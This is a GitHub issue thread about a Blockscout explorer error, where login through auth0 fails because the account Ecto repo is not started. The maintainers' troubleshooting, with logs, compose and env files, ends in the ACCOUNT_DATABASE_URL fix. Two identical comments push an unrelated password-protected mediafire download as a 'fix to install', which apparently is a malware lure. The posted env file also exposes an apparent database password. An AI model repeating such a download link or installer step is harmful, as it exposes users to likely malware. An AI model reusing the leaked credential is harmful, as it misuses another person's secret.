### ISSUE TITLE
(RuntimeError) could not lookup Ecto repo Explorer.Repo.Account

### ISSUE THREAD

**Issue by Pasha-tort** [blockscout/blockscout#10659]
### Description

Hello
I am not a developer Elixir, so I can't figure out what the problem is myself.
Our team is working with the developments of another team. And we got this stack.
I followed the blockscout documentation to configure the "my account" functionality using the auth0 service, and at the moment when a redirect to the address https:/auth/auth0/callback?path=/
occurs in the logs of the backend container I see these lines:
```
{
  time: "2024-08-21T17:02:28.924Z",
  severity: "error",
  message: `
    #PID<0.8722.2> running BlockScoutWeb.Endpoint (connection #PID<0.8721.2>, stream id 1) terminated\n
    Server: seven-moments-study.loca.lt:80 (http)\n
    Request: GET /auth/auth0/callback?path=%2F&code=d76Jrf9bgE0KzkMBtCMxFcRfdWplWRttgHJZLEs57vYTf&state=XfJpV0XWFWASgsXrzyYU57PA\n
    ** (exit) an exception was raised:\n    
    ** (RuntimeError) could not lookup Ecto repo Explorer.Repo.Account because it was not started or it does not exist\n        
    (ecto 3.11.1) lib/ecto/repo/registry.ex:22: Ecto.Repo.Registry.lookup/1\n        
    (ecto 3.11.1) lib/ecto/repo/supervisor.ex:160: Ecto.Repo.Supervisor.tuplet/2\n        
    (explorer 6.1.0) lib/explorer/repo.ex:145: Explorer.Repo.Account.one/2\n        
    (block_scout_web 6.1.0) lib/block_scout_web/models/user_from_auth.ex:15: BlockScoutWeb.Models.UserFromAuth.find_or_create/1\n        
    (block_scout_web 6.1.0) lib/block_scout_web/controllers/account/auth_controller.ex:37: BlockScoutWeb.Account.AuthController.callback/2\n        
    (block_scout_web 6.1.0) lib/block_scout_web/controllers/account/auth_controller.ex:1: BlockScoutWeb.Account.AuthController.action/2\n        
    (block_scout_web 6.1.0) lib/block_scout_web/controllers/account/auth_controller.ex:1: BlockScoutWeb.Account.AuthController.phoenix_controller_pipeline/2\n        
    (phoenix 1.5.14) lib/phoenix/router.ex:352: Phoenix.Router.__call__/2`,
  metadata: {
    error: {
      initial_call: null,
      reason: `
        ** (RuntimeError) could not lookup Ecto repo Explorer.Repo.Account because it was not started or it does not exist\n    
        (ecto 3.11.1) lib/ecto/repo/registry.ex:22: Ecto.Repo.Registry.lookup/1\n    
        (ecto 3.11.1) lib/ecto/repo/supervisor.ex:160: Ecto.Repo.Supervisor.tuplet/2\n    
        (explorer 6.1.0) lib/explorer/repo.ex:145: Explorer.Repo.Account.one/2\n    
        (block_scout_web 6.1.0) lib/block_scout_web/models/user_from_auth.ex:15: BlockScoutWeb.Models.UserFromAuth.find_or_create/1\n    
        (block_scout_web 6.1.0) lib/block_scout_web/controllers/account/auth_controller.ex:37: BlockScoutWeb.Account.AuthController.callback/2\n    
        (block_scout_web 6.1.0) lib/block_scout_web/controllers/account/auth_controller.ex:1: BlockScoutWeb.Account.AuthController.action/2\n    
        (block_scout_web 6.1.0) lib/block_scout_web/controllers/account/auth_controller.ex:1: BlockScoutWeb.Account.AuthController.phoenix_controller_pipeline/2\n    
        (phoenix 1.5.14) lib/phoenix/router.ex:352: Phoenix.Router.__call__/2\n`,
    },
  },
};
```
Let me remind you that I am not an Elixir developer, but all my attempts to find a solution to this error led me to the idea that the necessary Repo dependencies are not running. I will be glad for any help and information.

I run the application on a local PC with Windows operating system. Using docker-compose, which was downloaded together with the main blockout [repository](https://github.com/blockscout/blockscout)

### Type of the installation

Docker-compose

### Type of the JSON RPC archive node

Don't know

### Steps to reproduce

1. Fill in all the ENVs specified in the [documentation](https://docs.blockscout.com/setup-and-run-blockscout/configuration-options/my-account-settings)
2. Configure the auth0 service
3. Run the application via Docker Compose
4. Try to log in/log up a new user

### Backend version

latest

### Frontend version

latest

### Elixir & Erlang/OTP versions

Don't know

### Operating system

Windows

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by GimluCom** [comment]
It looks like you might not be using the latest version? Please fetch the latest images with `docker compose pull`
If that does not solve the issue, please share your `envs/common-blockscout.env` file, censoring sensitive values. Alternatively you may get technical support in [Discord](https://discord.gg/blockscout).

**Comment by Pasha-tort** [comment]
I checked, I am indeed using the latest version of the image, here is my file backend.yml:
```
version: '3.9'

services:
  backend:
    image: blockscout/${DOCKER_REPO:-blockscout}:${DOCKER_TAG:-latest}
    pull_policy: always
    restart: always
    stop_grace_period: 5m
    container_name: 'backend'
    command: sh -c "bin/blockscout eval \"Elixir.Explorer.ReleaseTasks.create_and_migrate()\" && bin/blockscout start"
    extra_hosts:
      - 'host.docker.internal:host-gateway'
    env_file:
      -  ../envs/common-blockscout.env
    volumes:
      - ./logs/:/app/logs/
```

Вот мой файл common-blockscout.yml:
```
ETHEREUM_JSONRPC_VARIANT=geth
ETHEREUM_JSONRPC_HTTP_URL=http://host.docker.internal:8545/
# ETHEREUM_JSONRPC_FALLBACK_HTTP_URL=
DATABASE_URL=postgresql://blockscout:ceWb1MeLBEeOIfk65gU8EjF8@db:5432/blockscout
# DATABASE_QUEUE_TARGET
ETHEREUM_JSONRPC_TRACE_URL=http://host.docker.internal:8545/
# ETHEREUM_JSONRPC_FALLBACK_TRACE_URL=
# ETHEREUM_JSONRPC_ETH_CALL_URL=
# ETHEREUM_JSONRPC_HTTP_TIMEOUT=
# CHAIN_TYPE=
NETWORK=
SUBNETWORK=Awesome chain
LOGO=/images/blockscout_logo.svg
# ETHEREUM_JSONRPC_WS_URL=
ETHEREUM_JSONRPC_TRANSPORT=http
ETHEREUM_JSONRPC_DISABLE_ARCHIVE_BALANCES=false
# ETHEREUM_JSONRPC_ARCHIVE_BALANCES_WINDOW=200
# ETHEREUM_JSONRPC_HTTP_HEADERS=
# ETHEREUM_JSONRPC_WAIT_PER_TIMEOUT=
# ETHEREUM_JSONRPC_GETH_TRACE_BY_BLOCK=
IPC_PATH=
NETWORK_PATH=/
BLOCKSCOUT_HOST=
BLOCKSCOUT_PROTOCOL=
SECRET_KEY_BASE=<my_secret>
# CHECK_ORIGIN=
PORT=4000
COIN_NAME=
# METADATA_CONTRACT=
# VALIDATORS_CONTRACT=
# KEYS_MANAGER_CONTRACT=
# REWARDS_CONTRACT=
# TOKEN_BRIDGE_CONTRACT=
EMISSION_FORMAT=DEFAULT
# CHAIN_SPEC_PATH=
# SUPPLY_MODULE=
COIN=
EXCHANGE_RATES_COIN=
# EXCHANGE_RATES_MARKET_CAP_SOURCE=
# EXCHANGE_RATES_TVL_SOURCE=
# EXCHANGE_RATES_PRICE_SOURCE=
# EXCHANGE_RATES_COINGECKO_COIN_ID=
# EXCHANGE_RATES_COINGECKO_API_KEY=
# EXCHANGE_RATES_COINMARKETCAP_API_KEY=
# EXCHANGE_RATES_COINMARKETCAP_COIN_ID=
POOL_SIZE=80
# EXCHANGE_RATES_COINGECKO_PLATFORM_ID=
# TOKEN_EXCHANGE_RATE_INTERVAL=
# TOKEN_EXCHANGE_RATE_REFETCH_INTERVAL=
# TOKEN_EXCHANGE_RATE_MAX_BATCH_SIZE=
# DISABLE_TOKEN_EXCHANGE_RATE=
POOL_SIZE_API=10
ECTO_USE_SSL=false
# DATADOG_HOST=
# DATADOG_PORT=
# SPANDEX_BATCH_SIZE=
# SPANDEX_SYNC_THRESHOLD=
HEART_BEAT_TIMEOUT=30
# HEART_COMMAND=
# BLOCKSCOUT_VERSION=
RELEASE_LINK=
BLOCK_TRANSFORMER=base
# GRAPHIQL_TRANSACTION=
# BLOCK_RANGES=
# FIRST_BLOCK=
# LAST_BLOCK=
# TRACE_BLOCK_RANGES=
# TRACE_FIRST_BLOCK=
# TRACE_LAST_BLOCK=
# FOOTER_CHAT_LINK=
# FOOTER_FORUM_LINK_ENABLED=
# FOOTER_FORUM_LINK=
# FOOTER_TELEGRAM_LINK_ENABLED=
# FOOTER_TELEGRAM_LINK=
# FOOTER_GITHUB_LINK=
FOOTER_LOGO=/images/blockscout_logo.svg
FOOTER_LINK_TO_OTHER_EXPLORERS=false
FOOTER_OTHER_EXPLORERS={}
SUPPORTED_CHAINS={}
CACHE_BLOCK_COUNT_PERIOD=7200
CACHE_TXS_COUNT_PERIOD=7200
CACHE_ADDRESS_SUM_PERIOD=3600
CACHE_TOTAL_GAS_USAGE_PERIOD=3600
CACHE_ADDRESS_TRANSACTIONS_GAS_USAGE_COUNTER_PERIOD=1800
CACHE_TOKEN_HOLDERS_COUNTER_PERIOD=3600
CACHE_TOKEN_TRANSFERS_COUNTER_PERIOD=3600
CACHE_ADDRESS_WITH_BALANCES_UPDATE_INTERVAL=1800
CACHE_AVERAGE_BLOCK_PERIOD=1800
CACHE_MARKET_HISTORY_PERIOD=21600
CACHE_ADDRESS_TRANSACTIONS_COUNTER_PERIOD=1800
CACHE_ADDRESS_TOKENS_USD_SUM_PERIOD=3600
CACHE_ADDRESS_TOKEN_TRANSFERS_COUNTER_PERIOD=1800
TOKEN_METADATA_UPDATE_INTERVAL=172800
CONTRACT_VERIFICATION_ALLOWED_SOLIDITY_EVM_VERSIONS=homestead,tangerineWhistle,spuriousDragon,byzantium,constantinople,petersburg,istanbul,berlin,london,paris,shanghai,default
CONTRACT_VERIFICATION_ALLOWED_VYPER_EVM_VERSIONS=byzantium,constantinople,petersburg,istanbul,berlin,paris,shanghai,default
# CONTRACT_VERIFICATION_MAX_LIBRARIES=10
CONTRACT_MAX_STRING_LENGTH_WITHOUT_TRIMMING=2040
# CONTRACT_DISABLE_INTERACTION=
# CONTRACT_AUDIT_REPORTS_AIRTABLE_URL=
# CONTRACT_AUDIT_REPORTS_AIRTABLE_API_KEY=
UNCLES_IN_AVERAGE_BLOCK_TIME=false
DISABLE_WEBAPP=false
API_V2_ENABLED=true
API_V1_READ_METHODS_DISABLED=false
API_V1_WRITE_METHODS_DISABLED=false
# API_RATE_LIMIT_DISABLED=true
# API_SENSITIVE_ENDPOINTS_KEY=
API_RATE_LIMIT_TIME_INTERVAL=1s
API_RATE_LIMIT_BY_IP_TIME_INTERVAL=5m
API_RATE_LIMIT=50
API_RATE_LIMIT_BY_KEY=50
API_RATE_LIMIT_BY_WHITELISTED_IP=50
API_RATE_LIMIT_WHITELISTED_IPS=
API_RATE_LIMIT_STATIC_API_KEY=
API_RATE_LIMIT_UI_V2_WITH_TOKEN=5
API_RATE_LIMIT_BY_IP=3000
DISABLE_INDEXER=false
DISABLE_REALTIME_INDEXER=false
DISABLE_CATCHUP_INDEXER=false
INDEXER_DISABLE_TOKEN_INSTANCE_REALTIME_FETCHER=false
INDEXER_DISABLE_TOKEN_INSTANCE_RETRY_FETCHER=false
INDEXER_DISABLE_TOKEN_INSTANCE_SANITIZE_FETCHER=false
INDEXER_DISABLE_TOKEN_INSTANCE_LEGACY_SANITIZE_FETCHER=false
INDEXER_DISABLE_PENDING_TRANSACTIONS_FETCHER=false
INDEXER_DISABLE_INTERNAL_TRANSACTIONS_FETCHER=false
# INDEXER_DISABLE_CATALOGED_TOKEN_UPDATER_FETCHER=
# INDEXER_DISABLE_BLOCK_REWARD_FETCHER=
# INDEXER_DISABLE_EMPTY_BLOCKS_SANITIZER=
# INDEXER_DISABLE_WITHDRAWALS_FETCHER=
# INDEXER_CATCHUP_BLOCKS_BATCH_SIZE=
# INDEXER_CATCHUP_BLOCKS_CONCURRENCY=
# INDEXER_CATCHUP_BLOCK_INTERVAL=
# INDEXER_EMPTY_BLOCKS_SANITIZER_INTERVAL=
# INDEXER_INTERNAL_TRANSACTIONS_BATCH_SIZE=
# INDEXER_INTERNAL_TRANSACTIONS_CONCURRENCY=
# INDEXER_BLOCK_REWARD_BATCH_SIZE=
# INDEXER_BLOCK_REWARD_CONCURRENCY=
# INDEXER_TOKEN_INSTANCE_RETRY_REFETCH_INTERVAL=
# INDEXER_TOKEN_INSTANCE_RETRY_BATCH_SIZE=10
# INDEXER_TOKEN_INSTANCE_RETRY_CONCURRENCY=
# INDEXER_TOKEN_INSTANCE_REALTIME_BATCH_SIZE=1
# INDEXER_TOKEN_INSTANCE_REALTIME_CONCURRENCY=
# INDEXER_TOKEN_INSTANCE_SANITIZE_BATCH_SIZE=10
# INDEXER_TOKEN_INSTANCE_SANITIZE_CONCURRENCY=
# INDEXER_TOKEN_INSTANCE_LEGACY_SANITIZE_BATCH_SIZE=10
# INDEXER_TOKEN_INSTANCE_LEGACY_SANITIZE_CONCURRENCY=10
# TOKEN_INSTANCE_OWNER_MIGRATION_CONCURRENCY=5
# TOKEN_INSTANCE_OWNER_MIGRATION_BATCH_SIZE=50
# INDEXER_COIN_BALANCES_BATCH_SIZE=
# INDEXER_COIN_BALANCES_CONCURRENCY=
# INDEXER_RECEIPTS_BATCH_SIZE=
# INDEXER_RECEIPTS_CONCURRENCY=
# INDEXER_TOKEN_CONCURRENCY=
# INDEXER_TOKEN_BALANCES_BATCH_SIZE=
# INDEXER_TOKEN_BALANCES_CONCURRENCY=
# INDEXER_TX_ACTIONS_ENABLE=
# INDEXER_TX_ACTIONS_MAX_TOKEN_CACHE_SIZE=
# INDEXER_TX_ACTIONS_REINDEX_FIRST_BLOCK=
# INDEXER_TX_ACTIONS_REINDEX_LAST_BLOCK=
# INDEXER_TX_ACTIONS_REINDEX_PROTOCOLS=
# INDEXER_TX_ACTIONS_AAVE_V3_POOL_CONTRACT=
# INDEXER_POLYGON_EDGE_L1_RPC=
# INDEXER_POLYGON_EDGE_L1_EXIT_HELPER_CONTRACT=
# INDEXER_POLYGON_EDGE_L1_WITHDRAWALS_START_BLOCK=
# INDEXER_POLYGON_EDGE_L1_STATE_SENDER_CONTRACT=
# INDEXER_POLYGON_EDGE_L1_DEPOSITS_START_BLOCK=
# INDEXER_POLYGON_EDGE_L2_STATE_SENDER_CONTRACT=
# INDEXER_POLYGON_EDGE_L2_WITHDRAWALS_START_BLOCK=
# INDEXER_POLYGON_EDGE_L2_STATE_RECEIVER_CONTRACT=
# INDEXER_POLYGON_EDGE_L2_DEPOSITS_START_BLOCK=
# INDEXER_POLYGON_EDGE_ETH_GET_LOGS_RANGE_SIZE=
# INDEXER_ZKEVM_BATCHES_ENABLED=
# INDEXER_ZKEVM_BATCHES_CHUNK_SIZE=
# INDEXER_ZKEVM_BATCHES_RECHECK_INTERVAL=
# INDEXER_REALTIME_FETCHER_MAX_GAP=
# INDEXER_FETCHER_INIT_QUERY_LIMIT=
# INDEXER_TOKEN_BALANCES_FETCHER_INIT_QUERY_LIMIT=
# INDEXER_COIN_BALANCES_FETCHER_INIT_QUERY_LIMIT=
# WITHDRAWALS_FIRST_BLOCK=
# ROOTSTOCK_REMASC_ADDRESS=
# ROOTSTOCK_BRIDGE_ADDRESS=
# ROOTSTOCK_LOCKED_BTC_CACHE_PERIOD=
# ROOTSTOCK_LOCKING_CAP=
# INDEXER_DISABLE_ROOTSTOCK_DATA_FETCHER=
# INDEXER_ROOTSTOCK_DATA_FETCHER_INTERVAL=
# INDEXER_ROOTSTOCK_DATA_FETCHER_BATCH_SIZE=
# INDEXER_ROOTSTOCK_DATA_FETCHER_CONCURRENCY=
# INDEXER_ROOTSTOCK_DATA_FETCHER_DB_BATCH_SIZE=
# TOKEN_ID_MIGRATION_FIRST_BLOCK=
# TOKEN_ID_MIGRATION_CONCURRENCY=
# TOKEN_ID_MIGRATION_BATCH_SIZE=
# INDEXER_INTERNAL_TRANSACTIONS_TRACER_TYPE=
# WEBAPP_URL=
# API_URL=
SHOW_ADDRESS_MARKETCAP_PERCENTAGE=true
CHECKSUM_ADDRESS_HASHES=true
CHECKSUM_FUNCTION=eth
DISABLE_EXCHANGE_RATES=true
TXS_STATS_ENABLED=true
SHOW_PRICE_CHART=false
SHOW_PRICE_CHART_LEGEND=false
SHOW_TXS_CHART=true
TXS_HISTORIAN_INIT_LAG=0
TXS_STATS_DAYS_TO_COMPILE_AT_INIT=10
COIN_BALANCE_HISTORY_DAYS=90
APPS_MENU=true
EXTERNAL_APPS=[]
# GAS_PRICE=
# GAS_PRICE_ORACLE_CACHE_PERIOD=
# GAS_PRICE_ORACLE_SIMPLE_TRANSACTION_GAS=
# GAS_PRICE_ORACLE_NUM_OF_BLOCKS=
# GAS_PRICE_ORACLE_SAFELOW_PERCENTILE=
# GAS_PRICE_ORACLE_AVERAGE_PERCENTILE=
# GAS_PRICE_ORACLE_FAST_PERCENTILE=
# RESTRICTED_LIST=
# RESTRICTED_LIST_KEY=
SHOW_MAINTENANCE_ALERT=false
MAINTENANCE_ALERT_MESSAGE=
CHAIN_ID=
MAX_SIZE_UNLESS_HIDE_ARRAY=50
HIDE_BLOCK_MINER=false
DISPLAY_TOKEN_ICONS=false
RE_CAPTCHA_SECRET_KEY=
RE_CAPTCHA_CLIENT_KEY=
RE_CAPTCHA_V3_SECRET_KEY=
RE_CAPTCHA_V3_CLIENT_KEY=
RE_CAPTCHA_DISABLED=false
JSON_RPC=
# API_RATE_LIMIT_HAMMER_REDIS_URL=redis://redis_db:6379/1
# API_RATE_LIMIT_IS_BLOCKSCOUT_BEHIND_PROXY=false
API_RATE_LIMIT_UI_V2_TOKEN_TTL_IN_SECONDS=18000
FETCH_REWARDS_WAY=trace_block
MICROSERVICE_SC_VERIFIER_ENABLED=true
# MICROSERVICE_SC_VERIFIER_URL=http://smart-contract-verifier:8050/
# MICROSERVICE_SC_VERIFIER_TYPE=sc_verifier
MICROSERVICE_SC_VERIFIER_URL=https://eth-bytecode-db.services.blockscout.com/
MICROSERVICE_SC_VERIFIER_TYPE=eth_bytecode_db
MICROSERVICE_ETH_BYTECODE_DB_INTERVAL_BETWEEN_LOOKUPS=10m
MICROSERVICE_ETH_BYTECODE_DB_MAX_LOOKUPS_CONCURRENCY=10
MICROSERVICE_VISUALIZE_SOL2UML_ENABLED=true
MICROSERVICE_VISUALIZE_SOL2UML_URL=http://visualizer:8050/
MICROSERVICE_SIG_PROVIDER_ENABLED=true
MICROSERVICE_SIG_PROVIDER_URL=http://sig-provider:8050/
# MICROSERVICE_BENS_URL=
# MICROSERVICE_BENS_ENABLED=
#MICROSERVICE_ACCOUNT_ABSTRACTION_ENABLED=true
#MICROSERVICE_ACCOUNT_ABSTRACTION_URL=
DECODE_NOT_A_CONTRACT_CALLS=true
# DATABASE_READ_ONLY_API_URL=
# ACCOUNT_DATABASE_URL=
# ACCOUNT_POOL_SIZE=
ACCOUNT_AUTH0_DOMAIN=<my_domain>
ACCOUNT_AUTH0_CLIENT_ID=<my_client_id>
ACCOUNT_AUTH0_CLIENT_SECRET=<my_secret>
ACCOUNT_PUBLIC_TAGS_AIRTABLE_URL=<my_url>
ACCOUNT_PUBLIC_TAGS_AIRTABLE_API_KEY=<my_key>
# ACCOUNT_SENDGRID_API_KEY=
# ACCOUNT_SENDGRID_SENDER=
# ACCOUNT_SENDGRID_TEMPLATE=
# ACCOUNT_VERIFICATION_EMAIL_RESEND_INTERVAL=
# ACCOUNT_PRIVATE_TAGS_LIMIT=2000
# ACCOUNT_WATCHLIST_ADDRESSES_LIMIT=15
ACCOUNT_CLOAK_KEY=<my_key>
ACCOUNT_ENABLED=true
ACCOUNT_REDIS_URL=redis://redis_db:6379
EIP_1559_ELASTICITY_MULTIPLIER=2
# MIXPANEL_TOKEN=
# MIXPANEL_URL=
# AMPLITUDE_API_KEY=
# AMPLITUDE_URL=
# IPFS_GATEWAY_URL=
# ADDRESSES_TABS_COUNTERS_TTL=10m
# DENORMALIZATION_MIGRATION_BATCH_SIZE=
# DENORMALIZATION_MIGRATION_CONCURRENCY=
SOURCIFY_INTEGRATION_ENABLED=false
SOURCIFY_SERVER_URL=
SOURCIFY_REPO_URL=
SHOW_TENDERLY_LINK=false
TENDERLY_CHAIN_PATH=
# SOLIDITYSCAN_CHAIN_ID=
# SOLIDITYSCAN_API_TOKEN=
# NOVES_FI_BASE_API_URL=
# NOVES_FI_CHAIN_NAME=
# NOVES_FI_API_TOKEN=
```

Also in the docker compose file itself from where I launch, I redefine some variables:
```
ETHEREUM_JSONRPC_VARIANT: "geth"
      TRANSACTION_HISTORY_UPDATE_INTERVAL: 60
      ADDRESS_TOTAL_HISTORY_UPDATE_INTERVAL: 60
      ADDRESS_WITH_BALANCES_UPDATE_INTERVAL: 60
      INDEXER_DISABLE_PENDING_TRANSACTIONS_FETCHER: true
      INDEXER_DISABLE_INTERNAL_TRANSACTIONS_FETCHER: true
      COIN: DIONE
      POOL_SIZE: 50
      ETHEREUM_JSONRPC_HTTP_URL: https://testnode.dioneprotocol.com/ext/bc/D/rpc
      ETHEREUM_JSONRPC_TRACE_URL: https://testnode.dioneprotocol.com/ext/bc/D/rpc
      ETHEREUM_JSONRPC_WS_URL: ws://host.docker.internal:8545/
      CHAIN_ID: "1337"
```

**Comment by GimluCom** [comment]
Please share the output of
```sh
docker image inspect -f '{{ index .Config.Labels "org.opencontainers.image.version" }}' blockscout/blockscout:latest
```
Could you also check if you have any errors in your backend logs prior to the one you already attached?

**Comment by Pasha-tort** [comment]
@GimluCom 
terminal output:
![image](https://github.com/user-attachments/assets/fa86aa02-e0f5-4d1e-8531-98737a27477c)
info log about error SendGrid because i don't have the ability to configure it yet:
![image](https://github.com/user-attachments/assets/babb324b-03c6-4587-a31e-b4b3d1f7a436)
no more errors

I indicated the variables COIN and CHAIN_ID in the list above
COIN: DIONE
CHAIN_ID: "1337"

**Comment by GimluCom** [comment]
Sorry, the issue is that `ACCOUNT_DATABASE_URL=<my_database>` needs to be set.

**Comment by Pasha-tort** [comment]
@GimluCom 
![image](https://github.com/user-attachments/assets/4ddd1b07-ae29-4f8e-96cf-cb72dc1f8916)
The documentation says that if no value is specified, it will be taken by default from the variable DATABASE_URL.
But I use auth0, so I need a connection string specifically to the external database auth0, right?
But auth0 does not provide a url for connecting to its databases...

**Comment by GimluCom** [comment]
> The documentation says that if no value is specified, it will be taken by default from the variable DATABASE_URL.

That is correct, however due to issue #10669, the `ACCOUNT_DATABASE_URL` ENV has be specified.

**Comment by Pasha-tort** [comment]
Thank you, this helped me
